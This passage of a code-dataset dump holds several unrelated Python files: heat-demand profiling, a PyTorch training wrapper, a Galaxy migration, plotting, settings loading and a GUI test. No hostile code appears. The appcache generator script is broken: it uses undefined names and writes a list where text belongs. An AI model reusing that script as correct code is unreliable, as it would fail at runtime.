It is possible\n # to connect it to the heating sector for future scenarios.\n del eb[\"electricity\"]\n del eb[\"total\"] # if electricity is removed total is not correct anymore.\n\n # get fraction of mechanical energy use and subtract it from the balance to\n # get the use of heat only.\n share_mech = share_of_mechanical_energy_bmwi(year)\n for c in share_mech.columns:\n for i in share_mech.index:\n eb.loc[(slice(None), c), i] -= (\n eb.loc[(slice(None), c), i] * share_mech.loc[i, c]\n )\n eb.sort_index(inplace=True)\n\n return eb\n\n\ndef share_of_mechanical_energy_bmwi(year):\n \"\"\"\n Get share of mechanical energy from the overall energy use per sector.\n\n Parameters\n ----------\n year : int\n\n Returns\n -------\n pandas.DataFrame\n\n Examples\n --------\n >>> share_of_mechanical_energy_bmwi(2014).loc['oil', 'retail']\n 0.078\n\n \"\"\"\n mech = pd.DataFrame()\n fs = bmwi.read_bmwi_sheet_7(\"a\")\n fs.sort_index(inplace=True)\n sector = \"Industrie\"\n\n total = float(fs.loc[(sector, \"gesamt\"), year])\n mech[sector] = (\n fs.loc[(sector, \"mechanische Energie\"), year].div(total).round(3)\n )\n\n fs = bmwi.read_bmwi_sheet_7(\"b\")\n fs.sort_index(inplace=True)\n for sector in fs.index.get_level_values(0).unique():\n total = float(fs.loc[(sector, \"gesamt\"), year])\n mech[sector] = (\n fs.loc[(sector, \"mechanische Energie\"), year]\n .div(total)\n .astype(float)\n .round(3)\n )\n mech.drop(\" - davon Strom\", inplace=True)\n mech.drop(\"mechanische Energie\", inplace=True)\n ren_col = {\n \"Industrie\": \"industrial\",\n \"Gewerbe, Handel, Dienstleistungen \": \"retail\",\n \"private Haushalte\": \"domestic\",\n }\n ren_index = {\n \" - davon Öl\": \"oil\",\n \" - davon Gas\": \"natural gas\",\n }\n mech.index.name = \"\"\n mech.rename(columns=ren_col, inplace=True)\n mech.rename(index=ren_index, inplace=True)\n mech.fillna(0, inplace=True)\n return mech\n\n\ndef get_heat_profile_from_demandlib(\n temperature, annual_demand, sector, year, build_class=1\n):\n \"\"\"\n Create an hourly load profile from the annual demand using the demandlib.\n\n Parameters\n ----------\n temperature : pandas.Series\n annual_demand : float\n sector : str\n year : int\n build_class : int\n\n Returns\n -------\n pandas.DataFrame\n\n Examples\n --------\n >>> temperature=pd.Series(list(range(50)), index=pd.date_range(\n ... '2014-05-03 12:00', periods=50, freq='h'))\n >>> temperature = 10 + temperature * 0.1\n >>> hp=get_heat_profile_from_demandlib(\n ... temperature, 5345, 'retail', 2014)\n >>> int(round(hp.sum()))\n 5302\n \"\"\"\n cal = Germany()\n holidays = dict(cal.holidays(year))\n\n if \"efh\" in sector:\n shlp_type = \"EFH\"\n elif \"mfh\" in sector:\n shlp_type = \"MFH\"\n elif \"domestic\" in sector:\n shlp_type = \"MFH\"\n elif \"retail\" in sector:\n shlp_type = \"ghd\"\n build_class = 0\n elif \"industrial\" in sector:\n shlp_type = \"ghd\"\n build_class = 0\n else:\n raise AttributeError('\"{0}\" is an unknown sector.'.format(sector))\n return bdew.HeatBuilding(\n temperature.index,\n holidays=holidays,\n temperature=temperature,\n shlp_type=shlp_type,\n wind_class=0,\n building_class=build_class,\n annual_heat_demand=annual_demand,\n name=sector,\n ww_incl=True,\n ).get_bdew_profile()\n\n\ndef get_heat_profiles_by_federal_state(\n year, to_csv=None, state=None, weather_year=None\n):\n \"\"\"\n Get heat profiles by state, sector and fuel. 
Use the pandas `groupby`\n method to group the results.\n\n The unit of the resulting data is TJ.\n\n Parameters\n ----------\n year : int\n Year of the demand data set.\n to_csv : str\n Path to the csv file.\n state : list or None\n List of abbreviations of federal states. If None a table with all\n federal states will be returned. Valid values are: BB, BE, BW, BY, HB,\n HE, HH, MV, NI, NW, RP, SH, SL, SN, ST, TH\n weather_year : int or None\n Can be used if the year of the weather data differs from the year of\n the demand data. If None the year parameter will be used. Use with\n care, because the demand data may include implicit weather effects.\n\n Returns\n -------\n pd.DataFrame\n\n Examples\n --------\n >>> fn=os.path.join(os.path.expanduser('~'),\n ... 'heat_profile.reegis_doctest.csv')\n >>> hp=get_heat_profiles_by_federal_state(2014, state=['BE', 'BB'],\n ... to_csv=fn)\n >>> hp.groupby(level=[0, 1], axis=1).sum().sum().round(1)\n BB domestic 66822.4\n industrial 69668.0\n retail 23299.5\n BE domestic 67382.1\n industrial 6162.8\n retail 39364.9\n dtype: float64\n >>> round(hp.groupby(level=[0, 2], axis=1).sum().sum().loc['BB'], 1)\n district heating 17646.9\n gas 3916.3\n hard coal 21378.4\n lignite 5630.5\n natural gas 63840.8\n oil 16257.4\n other 1112.1\n re 30007.4\n dtype: float64\n >>> hp_MWh=hp.div(0.0036)\n >>> round(hp_MWh.groupby(level=[2], axis=1).sum().sum().loc['lignite'], 1)\n 1671427.4\n >>> round(hp.sum().sum(), 1)\n 272699.7\n \"\"\"\n\n if weather_year is None:\n weather_year = year\n\n building_class = {}\n for (k, v) in cfg.get_dict(\"building_class\").items():\n for s in v.split(\", \"):\n building_class[s] = int(k)\n\n demand_state = heat_demand(year).sort_index()\n\n temperatures = coastdat.federal_state_average_weather(\n weather_year, \"temp_air\"\n )\n\n temperatures = temperatures.tz_convert(\"Europe/Berlin\")\n\n my_columns = pd.MultiIndex(levels=[[], [], []], codes=[[], [], []])\n heat_profiles = pd.DataFrame(columns=my_columns)\n\n if state is None:\n states = demand_state.index.get_level_values(0).unique()\n else:\n states = state\n\n # for region in demand_state.index.get_level_values(0).unique():\n for region in states:\n logging.info(\"Creating heat profile for {}\".format(region))\n tmp = demand_state.loc[region].groupby(level=0).sum()\n temperature = temperatures[region] - 273\n for fuel in tmp.columns:\n logging.debug(\n \"{0} - {1} ({2})\".format(region, fuel, building_class[region])\n )\n for sector in tmp.index:\n heat_profiles[\n (region, sector, fuel)\n ] = get_heat_profile_from_demandlib(\n temperature,\n tmp.loc[sector, fuel],\n sector,\n year,\n building_class[region],\n )\n heat_profiles.sort_index(1, inplace=True)\n\n if to_csv is not None:\n heat_profiles.to_csv(to_csv)\n return heat_profiles\n\n\ndef get_heat_profiles_by_region(\n regions, year, name=\"region\", from_csv=None, to_csv=None, weather_year=None\n):\n \"\"\"\n Get heat profiles for any region divided by sector and fuel. Use the\n pandas `groupby` method to group the results.\n\n The unit of the resulting data is TJ.\n\n Parameters\n ----------\n year : int\n Year of the demand data set.\n regions : geopandas.geoDataFrame\n A table with region geometries and there id as index.\n name : str\n Name of the regions set.\n from_csv : str\n Path to the file of the demand state profiles.\n to_csv : str\n Path with filename of the output file.\n weather_year : int or None\n Can be used if the year of the weather data differs from the year of\n the demand data. 
If None the year parameter will be used. Use with\n        care, because the demand data may include implicit weather effects.\n\n    Returns\n    -------\n    pd.DataFrame\n\n    Examples\n    --------\n    >>> from reegis import geometries\n    >>> fn=os.path.join(os.path.expanduser('~'),\n    ...                 'heat_profile.reegis_doctest.csv')\n    >>> regions=geometries.load(\n    ...     cfg.get('paths', 'geometry'),\n    ...     cfg.get('geometry', 'de21_polygons'))\n    >>> hpl=get_heat_profiles_by_region(regions, 2014, from_csv=fn)\n    >>> round(hpl.sum().sum(), 1)\n    272699.7\n    >>> os.remove(fn)\n\n    \"\"\"\n    if weather_year is None:\n        weather_year = year\n\n    # Get demand by federal state\n    if from_csv is None:\n        from_csv = os.path.join(\n            cfg.get(\"paths\", \"demand\"),\n            cfg.get(\"demand\", \"heat_profile_state_var\").format(\n                year=year, weather_year=weather_year\n            ),\n        )\n    if not os.path.isfile(from_csv):\n        get_heat_profiles_by_federal_state(\n            year, to_csv=from_csv, weather_year=weather_year\n        )\n    demand_state = pd.read_csv(from_csv, index_col=[0], header=[0, 1, 2])\n\n    # Create empty MultiIndex DataFrame to take the results\n    four_level_columns = pd.MultiIndex(\n        levels=[[], [], [], []], codes=[[], [], [], []]\n    )\n    demand_region = pd.DataFrame(\n        index=demand_state.index, columns=four_level_columns\n    )\n\n    # Get inhabitants for federal states and the given regions\n    ew = inhabitants.get_share_of_federal_states_by_region(year, regions, name)\n\n    # Use the inhabitants to recalculate the demand from federal states to\n    # the given regions.\n    for i in ew.items():\n        state = i[0][1]\n        region = i[0][0]\n        share = i[1]\n        if state in demand_state.columns.get_level_values(0).unique():\n            for sector in (\n                demand_state[state].columns.get_level_values(0).unique()\n            ):\n                for fuel in demand_state[state, sector].columns:\n                    demand_region[region, fuel, sector, state] = (\n                        demand_state[state, sector, fuel] * share\n                    )\n    demand_region.sort_index(axis=1, inplace=True)\n    demand_region = demand_region.groupby(level=[0, 1, 2], axis=1).sum()\n\n    if to_csv is not None:\n        demand_region.to_csv(to_csv)\n\n    return demand_region\n\n\nif __name__ == \"__main__\":\n    pass\n", "sub_path": "reegis/demand_heat.py", "file_name": "demand_heat.py", "file_ext": "py", "file_size_in_byte": 13934, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "reegis.energy_balance.get_usage_balance", "line_number": 55, "usage_type": "call"}, {"api_name": "reegis.energy_balance", "line_number": 55, "usage_type": "name"}, {"api_name": "reegis.energy_balance.get_domestic_retail_share", "line_number": 59, "usage_type": "call"}, {"api_name": "reegis.energy_balance", "line_number": 59, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 94, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 101, "usage_type": "call"}, {"api_name": "reegis.config.get_dict", "line_number": 108, "usage_type": "call"}, {"api_name": "reegis.config", "line_number": 108, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 155, "usage_type": "call"}, {"api_name": "reegis.bmwi.read_bmwi_sheet_7", "line_number": 156, "usage_type": "call"}, {"api_name": "reegis.bmwi", "line_number": 156, "usage_type": "name"}, {"api_name": "reegis.bmwi.read_bmwi_sheet_7", "line_number": 165, "usage_type": "call"}, {"api_name": "reegis.bmwi", "line_number": 165, "usage_type": "name"}, {"api_name": "workalendar.europe.Germany", "line_number": 221, "usage_type": "call"}, {"api_name": "demandlib.bdew.HeatBuilding", "line_number": 
238, "usage_type": "call"}, {"api_name": "demandlib.bdew", "line_number": 238, "usage_type": "name"}, {"api_name": "reegis.config.get_dict", "line_number": 314, "usage_type": "call"}, {"api_name": "reegis.config", "line_number": 314, "usage_type": "name"}, {"api_name": "reegis.coastdat.federal_state_average_weather", "line_number": 320, "usage_type": "call"}, {"api_name": "reegis.coastdat", "line_number": 320, "usage_type": "name"}, {"api_name": "pandas.MultiIndex", "line_number": 326, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 327, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 336, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 340, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 409, "usage_type": "call"}, {"api_name": "os.path", "line_number": 409, "usage_type": "attribute"}, {"api_name": "reegis.config.get", "line_number": 410, "usage_type": "call"}, {"api_name": "reegis.config", "line_number": 410, "usage_type": "name"}, {"api_name": "reegis.config.get", "line_number": 411, "usage_type": "call"}, {"api_name": "reegis.config", "line_number": 411, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 415, "usage_type": "call"}, {"api_name": "os.path", "line_number": 415, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 419, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 422, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 425, "usage_type": "call"}, {"api_name": "reegis.inhabitants.get_share_of_federal_states_by_region", "line_number": 430, "usage_type": "call"}, {"api_name": "reegis.inhabitants", "line_number": 430, "usage_type": "name"}]}
+{"seq_id": "246853409", "text": "\"\"\"Class for training / evaluating pytorch networks\n\nReference Implementations:\n- https://github.com/keras-team/keras/blob/master/keras/engine/training.py\n\"\"\"\n\nfrom tensorflow.python.keras.callbacks import (\n BaseLogger, CallbackList, History, ProgbarLogger\n)\nimport torch\n\n\nclass Model(object):\n \"\"\"Model for training / evaluating pytorch networks\n\n Reference Implementation:\n - https://github.com/keras-team/keras/blob/master/keras/engine/training.py\n \"\"\"\n\n def __init__(self, network, device=None):\n \"\"\"Init\n\n :param network: pytorch network to train or evaluate\n :type network: torch.nn.Module\n :param device: device to train the network on, e.g. 'cuda:0'\n :type device: str\n \"\"\"\n\n self.network = network\n self.device = device\n\n self._compiled = False\n # these are set in the `compile` method\n self.optimizer = None\n self.loss = None\n\n self.history = History()\n self.stop_training = False\n\n def _assert_compiled(self):\n \"\"\"Raise a value error if the model is not compiled\n\n This is a convenience wrapper to avoid duplicating these lines in\n multiple methods.\n\n :raises: RuntimeError if `self._compiled` is not True\n \"\"\"\n\n if not self._compiled:\n msg = ('Model must be compiled before training; please call '\n 'the `compile` method before training.')\n raise RuntimeError(msg)\n\n def _default_callbacks(self):\n \"\"\"Return default callbacks automatically applied during training\n\n By default, the following callbacks are automatically applied during\n training:\n - tensorflow.keras.callbacks.BaseLogger\n - tensorflow.keras.callbacks.ProgbarLogger\n - tensorflow.keras.callbacks.History (which is the `Model.history`\n attribute set in `Model.__init__`)\n\n :return: callbacks automatically applied to every Model\n :rtype: list\n \"\"\"\n\n default_callbacks = [\n BaseLogger(), ProgbarLogger(count_mode='steps'), self.history\n ]\n return default_callbacks\n\n def compile(self, optimizer, loss):\n \"\"\"Setup the model for training\n\n This sets `self.optimizer` and `self.loss` in place.\n\n :param optimizer: class name of the optimizer to use when training, one\n of those from `torch.optim` (e.g. `Adam`)\n :type optimizer: str\n :param loss: class name of the loss to use when training, one of those\n from `torch.nn` (e.g. 
`CrossEntropyLoss`)\n :type loss: str\n :raises AttributeError: if an invalid optimizer or loss function is\n specified\n \"\"\"\n\n try:\n Optimizer = getattr(torch.optim, optimizer)\n except AttributeError:\n msg = (\n '`optimizer` must be a `str` representing an optimizer from '\n 'the `torch.optim` package, and {} is not a valid one.'\n )\n raise AttributeError(msg.format(optimizer))\n self.optimizer = Optimizer(self.network.parameters())\n\n try:\n Loss = getattr(torch.nn, loss)\n except AttributeError:\n msg = (\n '`loss` must be a `str` representing a loss from '\n 'the `torch.nn` package, and {} is not a valid one.'\n )\n raise AttributeError(msg.format(loss))\n self.loss = Loss()\n\n self._compiled = True\n\n def evaluate_generator(self, generator, n_steps):\n \"\"\"Evaluate the network on batches of data generated from `generator`\n\n :param generator: a generator yielding batches indefinitely, where each\n batch is a tuple of (inputs, targets)\n :type generator: generator\n :param n_steps: number of batches to evaluate on\n :type n_steps: int\n :return: scalar test loss\n :rtype: float\n \"\"\"\n\n self._assert_compiled()\n\n if self.device:\n self.network.to(self.device)\n\n total_loss = 0\n n_obs = 0\n for _ in range(n_steps):\n inputs, targets = next(generator)\n n_obs += inputs.shape[0]\n\n loss = self.test_on_batch(inputs, targets)\n total_loss += loss\n\n return total_loss / n_obs\n\n def fit_generator(self, generator, n_steps_per_epoch, n_epochs=1,\n validation_data=None, n_validation_steps=None):\n \"\"\"Train the network on batches of data generated from `generator`\n\n :param generator: a generator yielding batches indefinitely, where each\n batch is a tuple of (inputs, targets)\n :type generator: generator\n :param n_steps_per_epoch: number of batches to train on in one epoch\n :type n_steps_per_epoch: int\n :param n_epochs: number of epochs to train the model\n :type n_epochs: int\n :param validation_data: generator yielding batches to evaluate the loss\n on at the end of each epoch, where each batch is a tuple of (inputs,\n targets)\n :type validation_data: generator\n :param n_validation_steps: number of batches to evaluate on from\n `validation_data`\n :raises RuntimeError: if only one of `validation_data` and\n `n_validation_steps` are passed in\n \"\"\"\n\n default_callbacks = self._default_callbacks()\n callbacks = CallbackList(default_callbacks)\n\n self._assert_compiled()\n\n invalid_inputs = (\n (validation_data is not None and n_validation_steps is None) or\n (n_validation_steps is not None and validation_data is None)\n )\n if invalid_inputs:\n msg = (\n '`validation_data` and `n_validation_steps` must both be '\n 'passed, or neither.'\n )\n raise RuntimeError(msg)\n\n if self.device:\n self.network.to(self.device)\n\n callbacks.set_params({\n 'epochs': n_epochs,\n 'metrics': ['loss', 'val_loss'],\n 'steps': n_steps_per_epoch,\n 'verbose': True\n })\n callbacks.set_model(self)\n\n callbacks.on_train_begin()\n for idx_epoch in range(n_epochs):\n if self.stop_training:\n break\n\n epoch_logs = {}\n callbacks.on_epoch_begin(idx_epoch)\n\n for idx_batch in range(n_steps_per_epoch):\n batch_logs = {'batch': idx_batch, 'size': 1}\n callbacks.on_batch_begin(idx_batch, batch_logs)\n\n inputs, targets = next(generator)\n loss = self.train_on_batch(inputs, targets)\n\n batch_logs['loss'] = loss\n callbacks.on_batch_end(idx_batch, batch_logs)\n\n if self.stop_training:\n break\n\n if validation_data:\n val_loss = self.evaluate_generator(\n validation_data, 
n_validation_steps\n )\n epoch_logs['val_loss'] = val_loss\n callbacks.on_epoch_end(idx_epoch, epoch_logs)\n callbacks.on_train_end()\n\n def load_weights(self, fpath_weights):\n \"\"\"Loads all layer weights from the provided `fpath_weights`\n\n :param fpath_weights: fpath_weights to load the model from\n :type fpath_weights: str\n \"\"\"\n\n self.network.load_state_dict(torch.load(fpath_weights))\n\n def save_weights(self, fpath_weights, overwrite=True):\n \"\"\"Dumps all layers and weights to the provided `fpath_weights`\n\n The weights can be loaded into a `Model` with the same topology using\n the `Model.load_weights` method.\n\n :param fpath_weights: fpath_weights to save the model to\n :type fpath_weights: str\n :param overwrite: overwrite an existing file at `fpath_weights`\n (if present); only True is currently supported\n :type overwrite: bool\n \"\"\"\n\n assert overwrite, '`overwrite=False` is not supported!'\n torch.save(self.network.state_dict(), fpath_weights)\n\n def test_on_batch(self, inputs, targets):\n \"\"\"Evaluate the model on a single batch of samples\n\n :param inputs: inputs to predict on\n :type inputs: torch.Tensor\n :param targets: targets to compare model predictions to\n :type targets: torch.Tensor\n :return: scalar test loss\n :rtype: float\n \"\"\"\n\n self._assert_compiled()\n\n self.network.train(mode=False)\n if self.device:\n inputs = inputs.to(self.device)\n targets = targets.to(self.device)\n\n outputs = self.network(inputs)\n loss = self.loss(outputs, targets)\n\n return loss.tolist()\n\n def train_on_batch(self, inputs, targets):\n \"\"\"Run a single forward / backward pass on a single batch of data\n\n :param inputs: inputs to use in the forward / backward pass\n :type inputs: torch.Tensor\n :param targets: targets to use in the forward / backward pass\n :type targets: torch.Tensor\n :return: scalar training loss\n :rtype: float\n \"\"\"\n\n self._assert_compiled()\n\n self.network.train(mode=True)\n if self.device:\n inputs = inputs.to(self.device)\n targets = targets.to(self.device)\n\n outputs = self.network(inputs)\n loss = self.loss(outputs, targets)\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n return loss.tolist()\n", "sub_path": "dl_playground/training/pytorch/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 9519, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tensorflow.python.keras.callbacks.History", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.callbacks.BaseLogger", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.callbacks.ProgbarLogger", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 89, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tensorflow.python.keras.callbacks.CallbackList", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 222, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 238, "usage_type": "call"}]}
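A hypothetical usage sketch for the Model wrapper in the record above. The import path is assumed from the record's sub_path; everything else follows the class's documented API:

import torch
from dl_playground.training.pytorch.model import Model  # assumed import path

def toy_generator():
    # Yield (inputs, targets) batches indefinitely, as fit_generator expects.
    while True:
        yield torch.randn(8, 4), torch.randint(0, 2, (8,))

network = torch.nn.Linear(4, 2)
model = Model(network)
model.compile(optimizer="Adam", loss="CrossEntropyLoss")
model.fit_generator(toy_generator(), n_steps_per_epoch=10, n_epochs=2)

Note that `compile` takes class names as strings and resolves them with getattr on torch.optim and torch.nn, so any optimizer or loss from those packages can be named the same way.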
+{"seq_id": "612132259", "text": "\"\"\"\nMigration script to create the genome_index_tool_data table.\n\"\"\"\n\nimport datetime\nimport logging\n\nfrom sqlalchemy import (\n Column,\n DateTime,\n ForeignKey,\n Integer,\n MetaData,\n String,\n Table\n)\n\nfrom galaxy.model.migrate.versions.util import (\n create_table,\n drop_table\n)\n\nlog = logging.getLogger(__name__)\nnow = datetime.datetime.utcnow\nmetadata = MetaData()\n\nGenomeIndexToolData_table = Table(\"genome_index_tool_data\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"job_id\", Integer, ForeignKey(\"job.id\"), index=True),\n Column(\"dataset_id\", Integer, ForeignKey(\"dataset.id\"), index=True),\n Column(\"deferred_job_id\", Integer, ForeignKey(\"deferred_job.id\"), index=True),\n Column(\"transfer_job_id\", Integer, ForeignKey(\"transfer_job.id\"), index=True),\n Column(\"fasta_path\", String(255)),\n Column(\"created_time\", DateTime, default=now),\n Column(\"modified_time\", DateTime, default=now, onupdate=now),\n Column(\"indexer\", String(64)),\n Column(\"user_id\", Integer, ForeignKey(\"galaxy_user.id\"), index=True))\n\n\ndef upgrade(migrate_engine):\n print(__doc__)\n metadata.bind = migrate_engine\n metadata.reflect()\n\n create_table(GenomeIndexToolData_table)\n\n\ndef downgrade(migrate_engine):\n metadata.bind = migrate_engine\n metadata.reflect()\n\n drop_table(GenomeIndexToolData_table)\n", "sub_path": "lib/galaxy/model/migrate/versions/0098_genome_index_tool_data_table.py", "file_name": "0098_genome_index_tool_data_table.py", "file_ext": "py", "file_size_in_byte": 1665, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sqlalchemy.MetaData", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 28, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 29, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 30, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 31, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 32, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 34, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", 
"line_number": 35, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 36, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 36, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 37, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 37, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 37, "usage_type": "call"}, {"api_name": "galaxy.model.migrate.versions.util.create_table", "line_number": 45, "usage_type": "call"}, {"api_name": "galaxy.model.migrate.versions.util.drop_table", "line_number": 52, "usage_type": "call"}]}
+{"seq_id": "110154889", "text": "\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfig = plt.figure()\n# syntax for 3-D projection\nax = plt.axes(projection='3d')\n# defining all 3 axes\nz = np.linspace(0, 1, 100)\nx = z**2\ny = z**3\n# plotting\nax.plot3D(x, y, z, 'r')\nax.set_title('3D line graph plotting')\nplt.show()", "sub_path": "3D_graph.py", "file_name": "3D_graph.py", "file_ext": "py", "file_size_in_byte": 282, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}]}
+{"seq_id": "546758391", "text": "import re\nimport os\nimport datetime\n\nclass appCache(object):\n\t__modelString = \"CACHE MANIFEST\\n#%s:v3\\n\\n%s\\n\\n# All other resources (e.g. sites) require the user to be online.\\nNETWORK:\\n*\"\n\tdef __init__(self, path, name=\"appCacheFile\"):\n\t\tif os.path.isfile(path):\n\t\t\tself.path = path\n\t\t\tself.name = name\n\t\t\tself.dirname = os.path.dirname(path)\n\t\t\tself.fileAppCache = os.path.join(self.dirname, self.name + '.appcache')\n\t\telse:\n\t\t\traise Exception('Path doesn\\'t contain a valid file!')\n\n\tdef _readFile(self):\n\t\tif os.path.exists(self.path):\n\t\t\twith open(self.path) as file:\n\t\t\t\treaded = file.read()\n\t\t\treturn re.findall('href=[\\\"\\']([^\\'\\\"].*?\\.css)[\\'\\\"]', readed) + re.findall('src=[\\\"\\']([^\\'\\\"].*?\\.js)[\\'\\\"]', readed)\n\t\treturn False\n\n\tdef createAppCache(self):\n\t\tpathsString = self._readFile();\n\n\t\twith open(self.fileAppCache, 'w+') as file:\n\t\t\tfile.write(__modelString % (datetime.date.today(), pathsString))\n\n\tdef printAppCache(self):\n\t\tpathsString = \"\";\n\n\t\tfor item in self._readFile():\n\t\t\tpathsString += item + '\\n'\n\n\t\tfile.write(__modelString % (datetime.date.today(), pathsString))\n\nappcache = appCache('D:\\wwwroot\\QA\\MarketPlace.Web\\index.html', 'appMarketplace')\nappcache.createAppCache()\t", "sub_path": "appcache.py", "file_name": "appcache.py", "file_ext": "py", "file_size_in_byte": 1203, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.isfile", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 27, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 35, "usage_type": "attribute"}]}
+{"seq_id": "321218472", "text": "import json\n\nclass Settings:\n def __init__(self, defpath):\n with open(defpath,'r') as deffile:\n deff = json.load(deffile)\n self.dateformat = deff[\"meta\"][\"dateformat\"]\n self.delimiter = deff[\"meta\"][\"delimiter\"]\n self.encoding = deff[\"meta\"][\"encoding\"]\n self.locale = deff[\"meta\"][\"locale\"]\n self.accountName = deff[\"meta\"][\"accountName\"]\n self.header = int(deff[\"meta\"][\"header\"])\n self.date = int(deff[\"columns\"][\"date\"])\n self.amount = int(deff[\"columns\"][\"amount\"])\n self.memo = int(deff[\"columns\"][\"memo\"])\n self.payee = int(deff[\"columns\"][\"payee\"])\n", "sub_path": "Settings.py", "file_name": "Settings.py", "file_ext": "py", "file_size_in_byte": 729, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "json.load", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "245607824", "text": "\"\"\"\n The test file need to be run inside the gui_testing directory,\n with application centered on the (1920,1080) resolution main screen.\n The test cases are for the system testing, with the tests visulized.\n The test cases are testing the user story 1, mainly with the functionalities\n regarding:\n 1. add, delete, update client information; choose client to add equipments\n 2. add, delete equipments; choose equipment to add new run with a pair of CSVs\n 3. add, delete new run\n\n\"\"\"\n\nimport unittest\nimport os\nimport shutil\nfrom time import sleep\nimport pyautogui as pg\n\n# W0311: bad indentation; E1101:no-member; C0325: Unnecessary parens\n# pylint: disable=W0311, E1101, C0325\n\n# use the current directory, where the script exists\nCWD = os.path.dirname(os.path.realpath(__file__))\n\nclass TestUserStory1(unittest.TestCase):\n \"\"\"The user story 1 related system testing\n\n Args:\n unittest ([type]): [The default testing module from Python]\n \"\"\"\n @classmethod\n def setUpClass(self):\n \"\"\" Create or replace previous folder \"\"\"\n try:\n folder = os.getcwd() + \"\\\\US01 Fail\"\n shutil.rmtree(folder)\n except FileNotFoundError:\n print(\"[There's no such directory]\")\n\n try:\n folder = os.getcwd() + \"\\\\US01 Success\"\n shutil.rmtree(folder)\n except FileNotFoundError:\n print(\"[There's no such directory]\")\n\n try:\n folder = os.getcwd() + \"\\\\US01\"\n shutil.rmtree(folder)\n except 